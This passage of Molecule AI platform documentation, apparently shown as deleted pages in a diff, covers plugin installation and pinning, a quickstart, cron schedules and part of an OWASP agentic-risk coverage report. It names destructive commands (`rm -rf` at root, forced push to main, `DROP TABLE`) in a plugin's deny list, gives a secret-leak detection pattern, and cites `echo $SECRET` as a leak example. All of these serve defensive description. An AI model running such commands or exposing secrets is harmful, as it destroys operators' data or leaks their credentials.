is orthogonal to the *shape* (what format it takes). This means you can install
a plugin from a local registry or from GitHub, and the workspace runtime
figures out how to load it based on its shape.
---
## Two-Axis Model
### Sources (where)
| Scheme | Description | Example |
|--------|-------------|---------|
| `local://` | Platform's curated plugin registry (auto-discovered from the `plugins/` directory) | `local://molecule-careful-bash` |
| `github://` (pinned) | GitHub repo at a specific tag or commit SHA — **required for all installs** | `github://owner/repo#v1.2.0` |
| `github://` (SHA) | Pin to an exact immutable commit | `github://owner/repo#abc1234` |
Use `GET /plugins/sources` to list all registered install-source schemes at
runtime.
### Shapes (what)
| Shape | Description |
|-------|-------------|
| agentskills.io format | `SKILL.md` + optional scripts, hooks, and `plugin.yaml` manifest |
| MCP server | Model Context Protocol server (coming soon for more runtimes) |
The shape is orthogonal to the source. A `github://` plugin and a `local://`
plugin can both be agentskills.io format. The per-runtime adapter inside the
workspace handles loading at startup.
---
## Installing a Plugin
```bash
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"source": "local://molecule-careful-bash"}'
```
From GitHub (pinned ref required):
```bash
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"source": "github://Molecule-AI/molecule-plugin-careful-bash#v1.0.0"}'
```
<Callout type="warn">
**Pinned refs are required.** `github://owner/repo` without a `#tag` or `#sha` suffix returns **HTTP 422 Unprocessable Entity**. Always pin to a specific tag (e.g. `#v1.0.0`) or commit SHA (e.g. `#abc1234`). See [Supply Chain Security](#supply-chain-security) for details and the escape hatch.
</Callout>
The platform resolves the source, stages the plugin files, copies them into the
workspace container at `/configs/plugins/<name>/`, and triggers an automatic
workspace restart so the runtime picks up the new plugin.
---
## Uninstalling a Plugin
```bash
curl -X DELETE http://localhost:8080/workspaces/{id}/plugins/{name} \
-H "Authorization: Bearer {token}"
```
Uninstall removes the plugin directory, cleans up copied skill directories and
rule markers from `CLAUDE.md`, and triggers an automatic workspace restart.
---
## Listing Plugins
### Platform Registry
List all available plugins in the platform registry:
```bash
# All plugins
curl http://localhost:8080/plugins
# Filtered by runtime
curl http://localhost:8080/plugins?runtime=claude-code
```
Plugins with no declared `runtimes` field in their manifest are treated as
"unspecified, try it" and included in filtered results.
### Available for a Workspace
Returns plugins filtered to those supported by the workspace's current runtime:
```bash
curl http://localhost:8080/workspaces/{id}/plugins/available \
-H "Authorization: Bearer {token}"
```
### Installed on a Workspace
```bash
curl http://localhost:8080/workspaces/{id}/plugins \
-H "Authorization: Bearer {token}"
```
Each installed plugin is annotated with whether it still supports the
workspace's current runtime. This lets the canvas grey out plugins that went
inert after a runtime change.
---
## Runtime Compatibility Check
Before changing a workspace's runtime, check which installed plugins would
become incompatible:
```bash
curl "http://localhost:8080/workspaces/{id}/plugins/compatibility?runtime=langgraph" \
-H "Authorization: Bearer {token}"
```
Response:
```json
{
"target_runtime": "langgraph",
"compatible": [...],
"incompatible": [...],
"all_compatible": false
}
```
The canvas uses this to show a confirmation dialog before applying a runtime
change.
---
## Built-in Plugins
### Hook Plugins (ambient enforcement)
These fire automatically via the harness layer. No explicit invocation needed.
| Plugin | Purpose |
|--------|---------|
| `molecule-careful-bash` | Refuses `git push --force` to main, `rm -rf` at root, `DROP TABLE` against prod schema. Ships the `careful-mode` skill as documentation. |
| `molecule-freeze-scope` | Locks edits to a single path glob via `.claude/freeze`. Useful while debugging. |
| `molecule-audit-trail` | Appends every Edit/Write to `.claude/audit.jsonl` for accountability. |
| `molecule-session-context` | Auto-loads recent cron-learnings and open PR/issue counts at session start. |
| `molecule-prompt-watchdog` | Injects warning context when the prompt mentions destructive keywords. |
### Skill Plugins (on-demand)
Invoked explicitly via the `Skill` tool during a conversation.
| Plugin | Purpose |
|--------|---------|
| `molecule-skill-code-review` | 16-criteria multi-axis code review rubric. |
| `molecule-skill-cross-vendor-review` | Adversarial second-model review for noteworthy PRs. |
| `molecule-skill-llm-judge` | Score whether a deliverable addresses the original request. |
| `molecule-skill-update-docs` | Sync repo docs after merges. |
| `molecule-skill-cron-learnings` | Defines the operational-memory JSONL format. |
### Workflow Plugins (slash commands)
Compose skills into repeatable multi-step workflows.
| Plugin | Command | Purpose |
|--------|---------|---------|
| `molecule-workflow-triage` | `/triage` | Full PR-triage cycle (gates 1-7 + code-review + merge if green). |
| `molecule-workflow-retro` | `/retro` | Weekly retrospective issue. |
### Shared Plugins
Loaded by default from the `plugins/` directory at the repo root.
| Plugin | Purpose |
|--------|---------|
| `molecule-dev` | Codebase conventions (rules injected into CLAUDE.md) + `review-loop` skill. |
| `superpowers` | `verification-before-completion`, `test-driven-development`, `systematic-debugging`, `writing-plans`. |
| `ecc` | General Claude Code guardrails. |
| `browser-automation` | Puppeteer/CDP-based web scraping and live canvas screenshots. Opt-in per workspace. |
### Platform Opt-in Plugins
Available in the platform registry (`local://`) but not installed by default.
Add them per workspace or as org defaults as needed.
| Plugin | Tools | Requires | Purpose |
|--------|-------|----------|---------|
| `molecule-medo` | `create_medo_app`, `update_medo_app`, `publish_medo_app` | `MEDO_API_KEY` secret | Baidu MeDo app builder integration — create, update, and publish MeDo mini-apps from within an agent. |
#### Installing molecule-medo
```bash
# 1. Set your API key
curl -X POST http://localhost:8080/workspaces/{id}/secrets \
-H "Authorization: Bearer {token}" \
-H "Content-Type: application/json" \
-d '{"key": "MEDO_API_KEY", "value": "your-medo-api-key"}'
# 2. Install the plugin (triggers auto-restart)
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Authorization: Bearer {token}" \
-H "Content-Type: application/json" \
-d '{"source": "local://molecule-medo"}'
```
Or add it to `org.yaml`:
```yaml
workspaces:
- name: App Builder
plugins: [molecule-medo]
secrets:
MEDO_API_KEY: "${MEDO_API_KEY}"
```
---
## Org Template Plugin Resolution
When deploying an org template, per-workspace `plugins:` lists in `org.yaml`
role overrides **UNION** with `defaults.plugins` (deduplicated, defaults first).
They do not replace them.
To opt a specific default out for a given role or workspace, prefix the plugin
name with `!` or `-`:
```yaml
defaults:
plugins:
- molecule-careful-bash
- molecule-audit-trail
- superpowers
workspaces:
researcher:
role: "Research Analyst"
plugins:
- browser-automation # added on top of defaults
- "!superpowers" # opted out of superpowers
```
Result for the `researcher` workspace:
`molecule-careful-bash`, `molecule-audit-trail`, `browser-automation`
---
## Install Safeguards
Environment variables that bound the cost and security of a single plugin install:
| Variable | Default | Description |
|----------|---------|-------------|
| `PLUGIN_INSTALL_BODY_MAX_BYTES` | `65536` (64 KiB) | Max request body size |
| `PLUGIN_INSTALL_FETCH_TIMEOUT` | `5m` | Whole fetch + copy deadline |
| `PLUGIN_INSTALL_MAX_DIR_BYTES` | `104857600` (100 MiB) | Max staged-tree size |
| `PLUGIN_ALLOW_UNPINNED` | _(unset)_ | Set to `true` to allow bare `github://owner/repo` refs without a tag or SHA. **Development use only — never set in production.** |
These prevent a slow or malicious source from tying up a handler goroutine or
exhausting disk space.
---
## Supply Chain Security
The platform enforces two controls to protect against compromised or tampered plugin sources (SAFE-T1102):
### 1. Pinned refs (enforced)
All `github://` installs must include a `#tag` or `#sha` suffix. This ensures the code you audit is exactly what gets installed — a push to the same branch cannot silently swap in different code between your review and a workspace restart.
```
✅ github://Molecule-AI/my-plugin#v1.2.3 (semver tag)
✅ github://Molecule-AI/my-plugin#abc1234def (commit SHA)
❌ github://Molecule-AI/my-plugin (→ HTTP 422)
```
To bypass during local development, set `PLUGIN_ALLOW_UNPINNED=true` in your platform environment. **Do not set this in production.**
### 2. SHA-256 content integrity (optional)
When installing from GitHub, you can provide an expected SHA-256 hash of the staged plugin tree. The platform verifies the hash before completing the install — a mismatch aborts with HTTP 422 and cleans up the staging directory.
```bash
curl -X POST http://localhost:8080/workspaces/{id}/plugins \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{
"source": "github://Molecule-AI/my-plugin#v1.2.3",
"sha256": "e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855"
}'
```
**How the hash is computed:** Walk all non-manifest files in the staged plugin tree, sort by relative path, concatenate as `<rel-path>\x00<content>`, and compute `sha256.Sum256`. The hash is lowercase hex.
You can pre-compute the expected hash from a clean checkout:
```bash
# In a clean clone of the plugin repo at the target ref:
find . -type f ! -name 'manifest.json' | sort | \
xargs -I{} sh -c 'printf "%s\x00" "{}" && cat "{}"' | sha256sum
```
---
## Plugin Download (External Workspaces)
External workspaces (those running outside Docker) can pull plugins as gzipped
tarballs:
```bash
curl http://localhost:8080/workspaces/{id}/plugins/{name}/download \
-H "Authorization: Bearer {token}" \
-o plugin.tar.gz
```
An optional `?source=github://owner/repo` query parameter lets external
workspaces pull from upstream repos without the platform pre-staging them.
Defaults to `local://<name>` when omitted.
---
## Org-Level Plugin Governance
Tenant admins can restrict which plugins workspaces in their org are permitted to load using a per-org allowlist. When an allowlist is configured, workspaces can only install plugins explicitly listed — all other installs are blocked at load time.
### Managing the allowlist
```bash
# Allow a plugin in the org
curl -X POST http://localhost:8080/admin/orgs/{orgId}/plugins/allowlist \
-H "Authorization: Bearer <admin-token>" \
-H "Content-Type: application/json" \
-d '{"plugin_name": "molecule-audit-trail"}'
# Remove a plugin from the allowlist
curl -X DELETE http://localhost:8080/admin/orgs/{orgId}/plugins/allowlist/molecule-audit-trail \
-H "Authorization: Bearer <admin-token>"
```
Both endpoints require `AdminAuth`. `orgId` is the org's UUID (set via `MOLECULE_ORG_ID` for SaaS tenants; in self-hosted single-org mode this is the org record created at first startup).
### Behaviour when an allowlist is configured
| Scenario | Result |
|----------|--------|
| No allowlist entries for the org | All plugins are permitted (default; backward-compatible) |
| Allowlist has at least one entry | Only listed plugins may be installed; others return `403 Forbidden` |
| Plugin already installed when allowlist was created | Pre-existing installs are not removed, but the plugin cannot be re-installed if later uninstalled |
### Relationship to supply-chain pinning
The governance allowlist and supply-chain pinning (`PLUGIN_ALLOW_UNPINNED`) are independent:
- The **allowlist** controls *which* plugins workspaces can load.
- **Pinning** controls *how* plugins must be referenced (exact commit/tag, never `latest`).
Both can be active simultaneously — the most restrictive rule wins.
---
## API Reference
| Method | Path | Description |
|--------|------|-------------|
| GET | `/plugins` | List plugin registry (supports `?runtime=` filter) |
| GET | `/plugins/sources` | List registered install-source schemes |
| GET | `/workspaces/:id/plugins` | List installed plugins |
| POST | `/workspaces/:id/plugins` | Install a plugin (`{"source": "scheme://spec"}`) |
| DELETE | `/workspaces/:id/plugins/:name` | Uninstall a plugin |
| GET | `/workspaces/:id/plugins/available` | Available plugins filtered by workspace runtime |
| GET | `/workspaces/:id/plugins/compatibility?runtime=X` | Preflight runtime-change compatibility check |
| GET | `/workspaces/:id/plugins/:name/download` | Download plugin as tarball (external workspaces) |
| POST | `/admin/orgs/:orgId/plugins/allowlist` | Add a plugin to the org allowlist (AdminAuth) |
| DELETE | `/admin/orgs/:orgId/plugins/allowlist/:name` | Remove a plugin from the org allowlist (AdminAuth) |

View File

@ -1,120 +0,0 @@
---
title: Quickstart
description: Spin up your first multi-agent org in under five minutes.
---
This guide gets you from zero to a running PM + Dev Lead + Engineer team
using the bundled `molecule-dev` template.
## Prerequisites
- Docker Desktop (or any Docker daemon) running locally
- Go 1.25+ and Node 20+ if building from source
- An LLM API key (Claude, OpenRouter, or Gemini)
<Callout type="info">
**Default model:** New workspaces that do not specify a model use `anthropic:claude-opus-4-7` by default. To pin a different model, set `model: <provider>:<name>` in the workspace `config.yaml` or pass `MODEL_DEFAULT` in your `.env`.
</Callout>
## Option A: One-command start (recommended)
```bash
git clone https://github.com/Molecule-AI/molecule-core.git
cd molecule-core
./scripts/dev-start.sh
```
This starts everything: Postgres, Redis, Platform (Go on `:8080`), and
Canvas (Next.js on `:3000`). Press `Ctrl-C` to stop all services.
## Option B: Docker Compose
```bash
git clone https://github.com/Molecule-AI/molecule-core.git
cd molecule-core
docker compose up -d
```
This starts the full stack including Langfuse (`:3001`) and Temporal (`:8233`).
## Option C: Manual setup
```bash
# 1. Start infrastructure
./infra/scripts/setup.sh # Postgres, Redis, Langfuse, Temporal
# 2. Start platform
cd platform && go run ./cmd/server # API on :8080
# 3. Start canvas (new terminal)
cd canvas && npm install && npm run dev # UI on :3000
```
## 2. Open the canvas
Navigate to [http://localhost:3000](http://localhost:3000). You should see
the empty state with template cards.
## 3. Deploy from a template
Click any template card to deploy a workspace instantly. Or import a full
org template:
```bash
curl -X POST http://localhost:8080/org/import \
-H 'Content-Type: application/json' \
-d '{"dir":"molecule-dev"}'
```
This provisions the 12-workspace dev team — PM, Research Lead and 3
researchers, Dev Lead and 5 engineers, plus Security/QA/UIUX auditors —
each as its own Docker container.
## 4. Talk to PM
PM is the entry point. Click the PM node on the canvas, open the Chat tab,
and send a task:
> *"Add a 'Last seen' column to the user list table on the admin page."*
PM will break the request into specific assignments, fan them out to the
right leads in parallel, verify the results, and report back when the
work is shipped.
## 5. Set up secrets
Most agents need an LLM API key. Set it as a global secret so all
workspaces inherit it:
```bash
curl -X PUT http://localhost:8080/settings/secrets \
-H 'Content-Type: application/json' \
-d '{"key":"ANTHROPIC_API_KEY","value":"sk-ant-..."}'
```
Or use the Settings panel (gear icon) in the canvas to manage secrets
per workspace.
## What just happened
You spun up a self-organising engineering team. They're real agents — they
can read your codebase, run tests, open PRs to GitHub. Their schedules
(security audit, UX audit, template fitness checks) run hourly on their own.
## Using the SaaS instead
Don't want to self-host? Use the cloud platform directly:
1. Go to [app.moleculesai.app](https://app.moleculesai.app)
2. Sign up and create an organization
3. Your tenant is provisioned at `<your-org>.moleculesai.app`
4. Deploy agents from templates — same experience, zero infrastructure
## Next steps
- Customise the [Org Template](/docs/org-template) to match your team.
- Add [Plugins](/docs/plugins) to give roles new capabilities.
- Wire a [Channel](/docs/channels) so you can talk to PM from Telegram.
- Connect your own agents with [External Agents](/docs/external-agents).
- Generate [API Tokens](/docs/tokens) for programmatic access.
- Read about the [Architecture](/docs/architecture) under the hood.

View File

@ -1,336 +0,0 @@
---
title: Schedules
description: Run recurring prompts on cron schedules — automated audits, reports, and maintenance.
---
## Overview
Schedules let you run recurring prompts against a workspace on a cron schedule.
Each tick fires an A2A `message/send` into the workspace, so the agent
processes the prompt as if it received a normal message. This enables automated
audits, daily reports, weekly retrospectives, and any other recurring task.
The scheduler polls the `workspace_schedules` table every 30 seconds. When a
schedule's `next_run_at` has passed, the scheduler fires the prompt and
computes the next run time.
```
Scheduler (30s poll) ──> workspace_schedules table
next_run_at <= now?
┌─────────┴──────────┐
│ A2A message/send │──> Workspace Agent
│ (callerID=system: │
│ scheduler) │
└─────────────────────┘
```
---
## Creating a Schedule
```bash
curl -X POST http://localhost:8080/workspaces/{id}/schedules \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{
"name": "Daily Security Audit",
"cron_expr": "0 9 * * *",
"timezone": "America/New_York",
"prompt": "Run a security audit of all open PRs. Check for leaked secrets, SQL injection, and auth bypass.",
"enabled": true
}'
```
**Required fields:**
| Field | Type | Description |
|-------|------|-------------|
| `cron_expr` | string | Standard cron expression (5-field: minute, hour, day-of-month, month, day-of-week) |
| `prompt` | string | The text sent to the workspace as an A2A message each tick |
**Optional fields:**
| Field | Type | Default | Description |
|-------|------|---------|-------------|
| `name` | string | `""` | Human-readable label |
| `timezone` | string | `"UTC"` | IANA timezone for cron evaluation (e.g. `America/New_York`, `Asia/Tokyo`) |
| `enabled` | bool | `true` | Whether the schedule fires |
The timezone is validated against Go's `time.LoadLocation` on create and update.
The cron expression is validated and the next run time is computed immediately.
---
## CRUD Operations
| Method | Path | Description |
|--------|------|-------------|
| GET | `/workspaces/:id/schedules` | List all schedules for a workspace |
| POST | `/workspaces/:id/schedules` | Create a new schedule |
| PATCH | `/workspaces/:id/schedules/:scheduleId` | Update a schedule (partial update via COALESCE) |
| DELETE | `/workspaces/:id/schedules/:scheduleId` | Delete a schedule |
### Update
PATCH accepts any subset of fields. Only provided fields are changed — the
handler uses `COALESCE` in SQL so omitted fields retain their current values.
If `cron_expr` or `timezone` changes, the next run time is recomputed.
```bash
curl -X PATCH http://localhost:8080/workspaces/{id}/schedules/{scheduleId} \
-H "Content-Type: application/json" \
-H "Authorization: Bearer {token}" \
-d '{"enabled": false}'
```
### Delete
```bash
curl -X DELETE http://localhost:8080/workspaces/{id}/schedules/{scheduleId} \
-H "Authorization: Bearer {token}"
```
All schedule operations are scoped to the owning workspace ID to prevent IDOR.
---
## Manual Trigger
Fire a schedule immediately, outside its cron cadence:
```bash
curl -X POST http://localhost:8080/workspaces/{id}/schedules/{scheduleId}/run \
-H "Authorization: Bearer {token}"
```
Returns the schedule's prompt so the frontend can POST it to
`/workspaces/:id/a2a`. This keeps the handler stateless.
---
## Run History
View the last 20 runs for a schedule, including error details for failed runs:
```bash
curl http://localhost:8080/workspaces/{id}/schedules/{scheduleId}/history \
-H "Authorization: Bearer {token}"
```
Response:
```json
[
{
"timestamp": "2026-04-16T09:00:02Z",
"duration_ms": 4523,
"status": "success",
"error_detail": "",
"request": {"schedule_id": "...", "prompt": "..."}
},
{
"timestamp": "2026-04-15T09:00:01Z",
"duration_ms": null,
"status": "error",
"error_detail": "A2A proxy returned 503: workspace container not running",
"request": {"schedule_id": "...", "prompt": "..."}
}
]
```
History is pulled from the `activity_logs` table filtered by
`activity_type = 'cron_run'` and the schedule ID in the request body.
---
## Source Field
Each schedule has a `source` field that tracks how it was created:
| Value | Meaning |
|-------|---------|
| `template` | Seeded by an org template import or bundle import. On re-import, only `template`-source rows are refreshed — `runtime` rows survive. |
| `runtime` | Created via the Canvas UI or API. These are user-owned and never overwritten by re-imports. |
---
## Status Values
The `last_status` field on a schedule tracks the outcome of the most recent
run:
| Status | Meaning |
|--------|---------|
| `success` | The A2A message was delivered and the workspace acknowledged it. |
| `error` | The A2A proxy returned a non-2xx status. `last_error` contains details. |
| `skipped` | The workspace was busy (concurrency-aware skip). The scheduler detected `active_tasks > 0` and deferred the run to avoid overloading the agent. |
---
## Schedule Health Endpoint
Peer workspaces can monitor each other's schedule health without admin auth:
```bash
curl http://localhost:8080/workspaces/{id}/schedules/health \
-H "X-Workspace-ID: {callerWorkspaceId}" \
-H "Authorization: Bearer {callerToken}"
```
This endpoint returns execution-state fields only (`last_run_at`,
`last_status`, `run_count`, `next_run_at`, `last_error`). It deliberately
omits `prompt` and `cron_expr` so sensitive task content is never exposed to
peer workspaces.
**Auth rules** (mirrors the A2A proxy pattern):
- `X-Workspace-ID` header required to identify the caller
- Caller's own bearer token validated (legacy workspaces grandfathered)
- `registry.CanCommunicate(callerID, workspaceID)` must return true
- System callers (`system:*`, `webhook:*`, `test:*`) bypass checks
- Self-calls always allowed
---
## Cross-Org Schedule Health (Admin)
Operators can retrieve schedule health for **every workspace in the org** in a single call:
```bash
curl http://localhost:8080/admin/schedules/health \
-H "Authorization: Bearer <admin-token>"
```
Requires `AdminAuth`. Returns an array covering every schedule across every workspace:
```json
[
{
"schedule_id": "uuid",
"workspace_id": "uuid",
"workspace_name": "security-auditor",
"expression": "0 */6 * * *",
"enabled": true,
"last_fired_at": "2026-04-18T12:00:00Z",
"next_scheduled_at": "2026-04-18T18:00:00Z",
"consecutive_empty": 0,
"phantom_detected": false
}
]
```
| Field | Description |
|-------|-------------|
| `last_fired_at` | Timestamp of the most recent run attempt (null if never fired) |
| `next_scheduled_at` | When the scheduler will next attempt this schedule |
| `consecutive_empty` | Count of consecutive runs that fired but received no task completion — an early indicator of a stuck or unresponsive workspace |
| `phantom_detected` | `true` if the schedule appears in the DB but its workspace has been removed; these are safe to delete |
Use this endpoint to audit cron health org-wide before a maintenance window, or to identify schedules that haven't fired when expected.
---
## Scheduler Internals
### Poll Loop
The scheduler runs a 30-second poll loop. Each tick:
1. Queries up to 50 due schedules (`next_run_at <= now AND enabled = true`)
2. Fires up to 10 concurrently via a semaphore
3. Each fire sends an A2A `message/send` with a 5-minute timeout
4. Updates `last_run_at`, `run_count`, `last_status`, and `next_run_at`
5. Logs the run to `activity_logs` with `activity_type = 'cron_run'`
### Panic Recovery
The scheduler recovers from panics inside the tick function. A single bad row,
malformed cron expression, or database blip cannot permanently kill the
scheduler. Without this recovery, the goroutine dies silently and the only
signal is "no crons firing."
### Liveness Watchdog
The scheduler reports heartbeats to the `supervised` subsystem. The
`/admin/liveness` endpoint exposes per-subsystem ages, so operators can detect
a stuck scheduler before it causes a missed-cron outage.
`Scheduler.Healthy()` returns true if the scheduler has completed a tick within
the last 60 seconds (2x the poll interval). Returns false before the first tick
or if the scheduler is stalled.
---
## Examples
### Hourly Security Audit
```json
{
"name": "Hourly Security Scan",
"cron_expr": "0 * * * *",
"timezone": "UTC",
"prompt": "Scan all open PRs for leaked secrets, SQL injection patterns, and auth bypass vulnerabilities. Report findings as a summary."
}
```
### Daily Standup Report
```json
{
"name": "Daily Standup",
"cron_expr": "0 9 * * 1-5",
"timezone": "America/Los_Angeles",
"prompt": "Generate a standup report: what was completed yesterday, what is planned today, and any blockers. Post to the team channel."
}
```
### Weekly Retrospective
```json
{
"name": "Weekly Retro",
"cron_expr": "0 17 * * 5",
"timezone": "America/New_York",
"prompt": "Write a weekly retrospective covering PRs merged, issues closed, cron failures, and code review findings. Post as a GitHub issue."
}
```
### Nightly Cleanup
```json
{
"name": "Nightly Cleanup",
"cron_expr": "0 2 * * *",
"timezone": "UTC",
"prompt": "Archive stale branches older than 30 days. Close issues that have been inactive for 60 days with a comment explaining the auto-close policy.",
"enabled": true
}
```
---
## Timezone Handling
All cron expressions are evaluated in the specified timezone. If no timezone is
provided, `UTC` is used. The timezone must be a valid IANA timezone string
(e.g. `America/New_York`, `Europe/London`, `Asia/Tokyo`).
When a schedule's `cron_expr` or `timezone` is updated, the `next_run_at` is
immediately recomputed using the new values. This prevents schedules from
firing at unexpected times after a timezone change.
---
## API Reference
| Method | Path | Description |
|--------|------|-------------|
| GET | `/workspaces/:id/schedules` | List schedules |
| POST | `/workspaces/:id/schedules` | Create schedule |
| PATCH | `/workspaces/:id/schedules/:scheduleId` | Update schedule |
| DELETE | `/workspaces/:id/schedules/:scheduleId` | Delete schedule |
| POST | `/workspaces/:id/schedules/:scheduleId/run` | Manual trigger |
| GET | `/workspaces/:id/schedules/:scheduleId/history` | Run history (last 20) |
| GET | `/workspaces/:id/schedules/health` | Health view (open to peers) |

View File

@ -1,9 +0,0 @@
---
title: Security
description: Security guides, advisories, and coverage reports for the Molecule AI platform.
---
## In this section
- [SAFE-MCP Security Advisory (2026-04-17)](/docs/security/safe-mcp-advisory) —
Three HIGH-severity findings for self-hosted operators

View File

@ -1,345 +0,0 @@
---
title: OWASP Agentic AI Top 10 Coverage
description: Mapping the OWASP Agentic AI Top 10 to Molecule AI security controls — honest coverage report.
---
## Overview
This page documents Molecule AI's coverage of the
[OWASP Agentic AI Top 10](https://owasp.org/agentic-ai-top-10/) security risks
for AI agents and agentic systems. Coverage is assessed against the platform as
shipped — not the roadmap or planned features.
**Honest verdict: 5 COVERED / 3 PARTIAL / 2 NOT COVERED**
| OWASP ID | Risk | Status |
|---|---|---|
| [A01](#a01-prompt-injection) | Prompt Injection | ✅ COVERED |
| [A02](#a02-sensitive-information-disclosure) | Sensitive Information Disclosure | ✅ COVERED |
| [A03](#a03-unbounded-resource-consumption) | Unbounded Resource Consumption | ✅ COVERED |
| [A04](#a04-sandboxing-escapes) | Sandboxing Escapes | ⚠️ PARTIAL |
| [A05](#a05-agent-human-relationship-dysfunction) | Agent-Human Relationship Dysfunction | ⚠️ PARTIAL |
| [A06](#a06-memory-poisoning) | Memory Poisoning | ✅ COVERED |
| [A07](#a07-cascade-hallucinations) | Cascade Hallucinations | ✅ COVERED |
| [A08](#a08-overreliance) | Overreliance | ⚠️ PARTIAL |
| [A09](#a09-supply-chain-vulnerabilities) | Supply Chain Vulnerabilities | ❌ NOT COVERED |
| [A10](#a10-improper-agency-grants) | Improper Agency Grants | ❌ NOT COVERED |
---
## A01 — Prompt Injection ✅ COVERED
**Risk:** An attacker embeds malicious instructions in external data (files, web
content, user messages) that the agent treats as authoritative commands.
**Molecule AI controls:**
- **Workspace isolation:** Each workspace runs in its own container with an
isolated filesystem. A prompt injection in workspace A cannot reach workspace
B's memory or secrets.
- **Secrets never in tool context:** Secrets stored via the platform API are
injected into the container's environment at runtime — they are never passed
as tool arguments or embedded in LLM prompts where external data might
reference them.
- **A2A peer validation:** A2A messages between workspaces include sender identity
verification. Agents cannot impersonate another workspace's agent.
- **Admin-level input filtering:** The platform API applies input validation
before data reaches agent prompts.
**Residual risk:** Prompt injection within a single workspace (e.g., a
malicious file processed by the agent) is not neutralized — this is the
responsibility of the agent's own prompt engineering and the LLM's alignment.
---
## A02 — Sensitive Information Disclosure ✅ COVERED
**Risk:** An agent exposes confidential data — credentials, PII, internal
documents — through tool calls, logs, or responses.
**Molecule AI controls:**
- **Encrypted secrets at rest:** Workspace secrets are encrypted with
`SECRETS_ENCRYPTION_KEY` (AES-256) before storage. Plaintext never hits the
database.
- **Secrets scoped per-workspace:** A token scoped to workspace A cannot access
workspace B's secrets.
- **Memory access controls:** The MCP server's memory tools respect workspace
boundaries. Agents cannot read another workspace's memory unless explicitly
shared via the `memory_set` peer API.
- **Langfuse observability:** Traces are visible to platform operators; audit
logs show which agent accessed which secret key. Agents should not log
secrets — this is enforced through pre-commit hooks in the workspace template
(the `sk-ant-` / `ghp_` / `AKIA` pattern detector).
- **Token display-once policy:** Workspace bearer tokens are returned in plaintext
exactly once at creation and never shown again.
**Residual risk:** If an agent deliberately calls a tool that prints a secret
value (e.g., `echo $SECRET` in a shell tool), the platform cannot prevent this.
Agent behavior inside the workspace is ultimately constrained by the tools
exposed and the LLM's instruction following.
---
## A03 — Unbounded Resource Consumption ✅ COVERED
**Risk:** An agent makes excessive LLM calls, processes unbounded data, or holds
memory in a loop, causing cost overruns or DoS.
**Molecule AI controls:**
- **Tier-based resource limits:** Each workspace tier has defined memory and CPU
caps enforced by the container scheduler. A runaway agent hits OOM before
consuming unbounded resources.
- **Rate limiting:** The platform enforces `RATE_LIMIT` requests/min per client.
This caps the rate at which agents can issue tool calls or make API requests.
- **Activity retention and cleanup:** `ACTIVITY_RETENTION_DAYS` (default 7) and
`ACTIVITY_CLEANUP_INTERVAL_HOURS` (default 6) automatically purge old activity
logs, preventing unbounded log growth.
- **Workspace hibernation:** Idle workspaces can be hibernated, releasing
container resources until the next task arrives.
- **LLM cost tracking:** Workspace usage is tracked per-token-model, giving
operators visibility into spend per workspace.
**Residual risk:** The platform does not enforce per-request token budgets or
LLM call counts within a task. A sophisticated agent can still issue many
calls within a single request burst. Operators should monitor Langfuse traces
for unusual activity patterns.
---
## A04 — Sandboxing Escapes ⚠️ PARTIAL
**Risk:** An agent escapes the container sandbox and accesses the host system,
neighboring containers, or the internal network.
**Molecule AI controls:**
- **Container isolation:** Workspace containers are isolated Docker containers
on the host. They do not run as privileged and have a non-root default user.
- **Bind-mount scoping:** The workspace directory is the only host path bind-mounted
into the container. Other host paths are not accessible.
- **Network namespace isolation:** Workspace containers are on a Docker bridge
network. Direct access to host services requires explicit platform routing.
**Gaps:**
- **Privileged tier (TIER4):** `TIER4_MEMORY_MB` workspaces run with fewer
restrictions. A compromised agent in a TIER4 workspace has more ability to
probe the host. This is a known trade-off for full-host workloads.
- **No seccomp/AppArmor/SELinux profiles:** The platform does not currently
apply mandatory access control profiles beyond Docker's default isolation.
- **No egress filtering by default:** Workspace containers can reach arbitrary
external URLs unless the operator configures network-level egress rules.
**Recommendation:** For untrusted agents, restrict to TIER2 or below. Configure
egress filtering at the Docker host or Kubernetes network policy level.
---
## A05 — Agent-Human Relationship Dysfunction ⚠️ PARTIAL
**Risk:** The human operator loses meaningful oversight of agent actions — the
agent acts without notification, makes irreversible decisions, or misrepresents
its reasoning.
**Molecule AI controls:**
- **A2A `notify_user`:** Agents can push notifications to the canvas, keeping the
human informed of progress and key decisions. This is an opt-in capability for
agents to use.
- **Langfuse observability:** All LLM calls and tool executions are traced.
Platform operators can review the full decision trace for any workspace.
- **Manual override endpoints:** Admins can pause, resume, or terminate any
workspace through the `/admin/*` API endpoints.
- **Activity logs:** All agent actions are logged with timestamps and caller identity.
**Gaps:**
- **`notify_user` is not mandatory:** The workspace template does not require
agents to notify humans of significant actions. An agent can run without
ever pushing a canvas notification.
- **No confirmation gates:** The platform does not provide a mechanism for an
agent to pause and wait for human approval before taking a consequential
action (e.g., deleting a file, sending an external API request).
- **No explanation requirements:** Agents are not required to log their reasoning
before taking actions. Langfuse traces show tool calls but not the agent's
internal chain-of-thought unless the agent explicitly logs it.
**Recommendation:** Configure agents to call `notify_user` at key decision
points. Monitor Langfuse for silent agent activity.
---
## A06 — Memory Poisoning ✅ COVERED
**Risk:** An attacker manipulates the agent's memory store to inject malicious
instructions or biases that the agent reads back and acts on.
**Molecule AI controls:**
- **Memory write authorization:** `memory_set` and `memory_set_peer` require
valid workspace authentication. External attackers cannot write to a
workspace's memory without a valid token.
- **Secrets excluded from memory:** Secrets are stored separately from the
general-purpose memory store and are not readable via the memory tools.
- **Per-workspace memory isolation:** Memory keys are namespaced to the
workspace. Agents in workspace A cannot write to workspace B's memory unless
an explicit A2A `memory_set_peer` call is made from B to A.
- **Semantic search gating:** The `search_memory` tool operates only on the
authenticated workspace's memory. Cross-workspace search is not permitted
without explicit peer delegation.
**Residual risk:** A compromised or malicious agent within a workspace can
overwrite its own memory with poisoned data. This is an agent-level concern,
not a platform-level control.
---
## A07 — Cascade Hallucinations ✅ COVERED
**Risk:** An agent generates incorrect outputs that are fed downstream as
ground-truth, compounding errors across multiple agent calls or tool chains.
**Molecule AI controls:**
